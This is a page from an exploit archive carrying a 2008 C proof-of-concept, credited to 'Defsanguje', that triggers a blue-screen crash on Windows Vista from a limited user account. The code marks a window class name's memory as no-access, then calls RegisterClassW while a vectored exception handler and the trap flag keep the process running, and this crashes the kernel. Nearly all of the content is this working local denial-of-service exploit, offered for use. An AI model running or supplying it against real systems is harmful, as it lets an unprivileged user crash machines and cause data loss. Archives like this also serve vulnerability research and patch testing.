vista-access.txt

vista-access.txt: Posted Oct 6, 2008; Authored by Defsanguje; Microsoft Windows Vista access violation from limited account denial of service blue screen of death exploit.; tags | exploit, denial of service; systems | windows; SHA-256 | c1f3a692fc163324f440f798f6db2fa7d92396e6f59f7ed7e36df7e9ad735baf; Download | Favorite | View

vista-access.txt

// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>

WCHAR szClass[] = L"BSODClass";

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

typedef struct
{
    DWORD dwWriteViolation;
    LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main()
{
    WNDCLASSW wc;
    DWORD dwOldProt;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    // Setup vectored exception handler. SEH would work also.
    pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),
                                                            "RtlAddVectoredExceptionHandler");
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    // Dummy data
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress;
    static DWORD dwOldProt;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
    switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ACCESS_VIOLATION:
            avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
            VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
            lpLastAddress = avParams->lpAddress;

            // Set trap flag
            lpExceptionInfo->ContextRecord->EFlags |= 0x100;
            break;
        case STATUS_SINGLE_STEP:
            VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
            break;
        default:
            break;
    }
    return EXCEPTION_CONTINUE_EXECUTION;
;
}

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

vista-access.txt

vista-access.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vista-access.txt

Share This

vista-access.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems